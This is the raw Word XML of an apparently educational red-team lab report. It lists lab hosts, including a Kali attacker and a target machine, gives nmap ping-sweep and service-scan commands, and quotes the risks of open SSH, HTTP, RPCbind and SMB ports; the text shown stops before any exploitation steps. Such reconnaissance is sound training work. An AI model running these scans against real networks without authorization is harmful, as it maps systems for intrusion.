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6544" w:rsidRPr="00297AE5" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00297AE5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Red Team: Summary of Operations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRPr="00297AE5" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRPr="00297AE5" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00297AE5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:r>
        <w:t>- Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:r>
        <w:t>- Critical Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:r>
        <w:t>- Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544"/>
    <w:p w:rsidR="00126544" w:rsidRPr="00297AE5" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00297AE5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544"/>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="004617F8">
      <w:r>
        <w:t xml:space="preserve">Nmap scan results for each machine reveal the </w:t>
      </w:r>
      <w:r w:rsidR="008310DB">
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008310DB" w:rsidRDefault="008310DB" w:rsidP="008310DB">
      <w:r>
        <w:t>192.168.1.1 – Windows 10 Pro – Hyper-V Host Machine (ML-RefVm-684427)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008310DB" w:rsidRDefault="008310DB" w:rsidP="008310DB">
      <w:r>
        <w:t>192.168.1.100 – Ubuntu/Linux – Kibana SIEM Machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008310DB" w:rsidRDefault="008310DB" w:rsidP="008310DB">
      <w:r>
        <w:t>192.168.1.105 – Ubuntu/Linux – Capstone Machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008310DB" w:rsidRDefault="008310DB" w:rsidP="008310DB">
      <w:r>
        <w:t>192.168.1.110 – Debian/Linux – Target 1 Machine (Exploited)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008310DB" w:rsidRDefault="008310DB" w:rsidP="008310DB">
      <w:r>
        <w:t>192.168.1.115 – Debian/Linux – Target 2 Machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008310DB" w:rsidRDefault="008310DB" w:rsidP="008310DB">
      <w:r>
        <w:t>192.168.1.90 – Kali/Linux - Attacker Machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72ABB" w:rsidRDefault="00C72ABB" w:rsidP="00126544">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi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5943600" cy="3108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-pingsweep-target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F8" w:rsidRDefault="00314519" w:rsidP="004617F8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C72ABB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004617F8">
        <w:t xml:space="preserve"> Ping Sweep &gt; $ </w:t>
      </w:r>
      <w:r w:rsidR="004617F8">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap </w:t>
      </w:r>
      <w:r w:rsidR="004617F8">
        <w:rPr>
          <w:rStyle w:val="nt"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-sP</w:t>
      </w:r>
      <w:r w:rsidR="004617F8">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.1-255</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544"/>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:r>
        <w:t>This scan identifies the services below as potential points of entry:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:r>
        <w:t>- Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:r>
        <w:t xml:space="preserve">  - List of</w:t>
      </w:r>
      <w:r w:rsidR="004617F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00297AE5" w:rsidRPr="003F111A" w:rsidRDefault="00297AE5" w:rsidP="00126544">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F111A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SSH:22, </w:t>
      </w:r>
      <w:r w:rsidR="003F111A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F111A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP:80, </w:t>
      </w:r>
      <w:r w:rsidR="003F111A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F111A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">RPCBIND:111, </w:t>
      </w:r>
      <w:r w:rsidR="003F111A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F111A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NETBIOS-SAMBA:139, </w:t>
      </w:r>
      <w:r w:rsidR="003F111A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F111A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NETBIOS-SAMBA:445</w:t>
      </w:r>
      <w:r w:rsidR="003F111A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F111A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> [ALL OPEN]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004617F8" w:rsidRDefault="004617F8" w:rsidP="00126544"/>
    <w:p w:rsidR="00126544" w:rsidRDefault="004617F8" w:rsidP="00126544">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00126544">
        <w:t>can results to prove the identified vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRPr="00314519" w:rsidRDefault="00126544" w:rsidP="00314519">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00314519">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap </w:t>
      </w:r>
      <w:r w:rsidRPr="00314519">
        <w:rPr>
          <w:rStyle w:val="nt"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-sV</w:t>
      </w:r>
      <w:r w:rsidRPr="00314519">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0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-port80open-target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44" w:rsidRDefault="00314519" w:rsidP="00126544">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00C72ABB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00297AE5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00297AE5" w:rsidRPr="00210D28">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Service and Port Scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544"/>
    <w:p w:rsidR="00314519" w:rsidRDefault="00314519" w:rsidP="00126544"/>
    <w:p w:rsidR="00314519" w:rsidRDefault="00314519" w:rsidP="00126544"/>
    <w:p w:rsidR="00314519" w:rsidRDefault="00314519" w:rsidP="00126544"/>
    <w:p w:rsidR="00314519" w:rsidRDefault="00314519" w:rsidP="00126544"/>
    <w:p w:rsidR="00314519" w:rsidRDefault="00314519" w:rsidP="00126544"/>
    <w:p w:rsidR="00314519" w:rsidRDefault="00314519" w:rsidP="00126544"/>
    <w:p w:rsidR="00314519" w:rsidRDefault="00314519" w:rsidP="00126544"/>
    <w:p w:rsidR="00314519" w:rsidRDefault="00314519" w:rsidP="00126544"/>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The following vulnerabilities were identified on each target:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRPr="001B2F09" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>- Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRPr="001B2F09" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">  - List of</w:t>
      </w:r>
      <w:r w:rsidR="00297AE5" w:rsidRPr="001B2F09">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Critical Vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00297AE5" w:rsidRPr="001B2F09">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB5401" w:rsidRDefault="00EB5401" w:rsidP="00126544"/>
    <w:p w:rsidR="00EB5401" w:rsidRDefault="00EB5401" w:rsidP="00EB5401">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Weakness of Secure Shell </w:t>
      </w:r>
      <w:r w:rsidR="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>(Port 22)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB5401" w:rsidRDefault="00EB5401" w:rsidP="00EB5401">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2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[</w:t>
      </w:r>
      <w:r w:rsidRPr="003E7F25">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>asperasoft.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB5401" w:rsidRDefault="003E7F25" w:rsidP="003E7F2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“Port 22 is subject to countless,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unauthorized login attempts by hackers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> who are attempting to access unsecured servers. A highly effective deterrent is to simply turn off Port 22 and run the service on a seemingly random port above 1024 (and up to 65535).” </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB5401" w:rsidRDefault="00EB5401" w:rsidP="00EB540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E7F25" w:rsidRDefault="001B2F09" w:rsidP="00EB5401">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>HTTP V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>ulnerabilities (Port 80)</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:anchor=":~:text=As%20such%2C%20Port%2022%20is,(and%20up%20to%2065535)." w:history="1">
        <w:r w:rsidR="003E7F25" w:rsidRPr="003E7F25">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1A0DAB"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:br/>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00EB5401" w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[csoonline.com]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB5401" w:rsidRDefault="00EB5401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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TCP port 80 for HTTP supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the web traffic that web browsers receive</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. According to Norby, attacks on web clients that travel over port 80 include SQL injections, cross-site request forgeries, cross-site scripting, and buffer overruns. Cyber criminals will set up their services on individual ports.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="70757A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB5401" w:rsidRDefault="00EB5401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</w:p>
    <w:p w:rsidR="00EB5401" w:rsidRPr="00EB5401" w:rsidRDefault="00EB5401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0DAB"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://security.stackexchange.com/questions/80799/security-risk-of-opening-port-111-rpcbind" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB5401" w:rsidRPr="00EB5401" w:rsidRDefault="00EB5401" w:rsidP="00EB5401">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Security ris</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>k of opening port 111 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00E24976">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>bind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB5401" w:rsidRPr="00EB5401" w:rsidRDefault="00EB5401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0DAB"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>security.stackexchange.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="5F6368"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB5401" w:rsidRPr="001B2F09" w:rsidRDefault="00EB5401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EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>If you expose this service to the internet, everybody can query this information without having to authenticate. It can be usef</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ul to attackers to know what you have running.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB5401" w:rsidRDefault="00EB5401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D5156"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB5401" w:rsidRDefault="00EB5401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D5156"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB5401" w:rsidRDefault="00EB5401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D5156"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB5401" w:rsidRPr="00EB5401" w:rsidRDefault="00EB5401" w:rsidP="00EB5401">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>SMB: A Description of Ports 445 + 139</w:t>
      </w:r>
      <w:r w:rsidR="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Net</w:t>
      </w:r>
      <w:r w:rsidR="00E24976">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>BIOS</w:t>
      </w:r>
      <w:r w:rsidR="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB5401" w:rsidRDefault="00EB5401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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
